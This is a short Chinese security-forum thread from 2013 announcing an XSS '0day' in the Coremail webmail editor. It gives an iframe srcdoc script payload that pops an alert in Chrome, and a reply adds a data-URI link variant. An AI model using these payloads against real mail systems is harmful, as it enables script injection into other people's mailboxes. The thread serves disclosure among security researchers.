来个coremail XSS 0day

2013-06-15 11:20:23 9 lusiyu 4818

coremail 神马东西不用说了

写邮件时源码编辑
<iframe srcdoc='<script>alert(1)</script>
'>

chrome下XSS 成功

类别 Web安全

关于作者

lusiyu7篇文章238篇回复

评论9次

要评论？请先登录或注册

9楼

stephen
2013-7-7 12:11

IE8试试

回复|@ta|踩(0)|顶(0)
8楼

粉丿丶兜兜
2013-6-23 23:17

应该是怎么显示的啊你直接用代码方式粘贴不就行了不要普通粘贴

回复|@ta|踩(0)|顶(0)
7楼

web安全测试
2013-6-20 16:35

这个好啊我们能做些什么啊

回复|@ta|踩(0)|顶(0)
6楼

t00ls管理团队01
2013-6-15 23:17

截个图传个图片吧。

回复|@ta|踩(0)|顶(0)
5楼

lusiyu
2013-6-15 22:05

单引号内输入的是实体字符但给显示成字母了。

回复|@ta|踩(0)|顶(0)
4楼

t00ls管理团队01
2013-6-15 11:30

只针对chrome？土司哪里显示有问题？

回复|@ta|踩(0)|顶(0)
3楼

lusiyu
2013-6-15 11:23

这个漏洞也不难找

回复|@ta|踩(0)|顶(0)
2楼

lusiyu
2013-6-15 11:22

<a href="data或者实体字符“>点我</a>能够通杀所有浏览器但不够主动

回复|@ta|踩(0)|顶(0)
1楼

lusiyu
2013-6-15 11:21

土司显示不正确单引号里面都是实体字符的

回复|@ta|踩(0)|顶(0)

热门文章

Web安全Discuz! 储型跨站脚本（XSS）漏洞

漏洞类型: 存储型XSSDiscuz ：需要启动日志模块（默认是关闭的 ...

2025-06-17 18:35:58 8 3002

安全资讯基于 Linux 的联想网络摄像头漏洞可被远程利用，引发 BadUSB 攻击

网络安全研究人员披露了联想部分型号网络摄像头的漏洞，这些漏洞 ...

2025-08-10 10:39:35 6 722

安全资讯大型语言模型 (LLM) 正陷入网络钓鱼诈骗：当 AI 给你错误的 URL 时会发生什么？😜😜😜😱

图片引用自:netcraftIain-Thomson：犯罪分子已经掌握了一种误导 ...

2025-07-05 04:08:29 6 1648

安全资讯从“AI生成色情小说”案看网络传播淫秽物品案件辩护工作开展【T00ls法律讲堂第五十四期】

近日，从网络公开信息获悉，湖北省大冶市人民检察院将国内首例“ ...

2025-08-11 14:26:04 13 732

安全资讯勒索软件谈判专家被发现与黑客合伙并从赎金中获得抽成目前已被刑事调查

美国司法部日前对某位前勒索软件谈判专家进行刑事调查，原因是这 ...

2025-07-04 21:46:12 9 1977

精华推荐

逆向破解那些shellcode免杀总结

自己还是想把一些shellcode免杀的技巧通过白话文、傻瓜式的文章 ...

2020-02-07 21:59:43 100 5681

CTF研究带你走进 S7COMM 与 MODBUS 工控协议

# 0x01 S7COMM协议S7COMM 全称S7 Communication，是西门子专有协 ...

2019-08-12 16:09:04 2 201

渗透测试通过代码审计拿下境外某网站

某日无聊，想着搞个网站玩玩，就在google上随便找了一个，结果发 ...

2018-09-22 19:00:02 38 2652

渗透测试利用WMI代替psexec——WMIEXEC.vbs

0x01 背景内网渗透中经常用到psexec这个工具，可以很方便的得到 ...

2012-12-10 10:54:10 74 19965

渗透测试【CVE-2020-0688】的武器化与.net反序列化漏洞那些事

# CVE-2020-0688的武器化与.net反序列化漏洞那些事## 0x00 前言T ...

2020-03-01 21:07:59 56 28973

Top ↑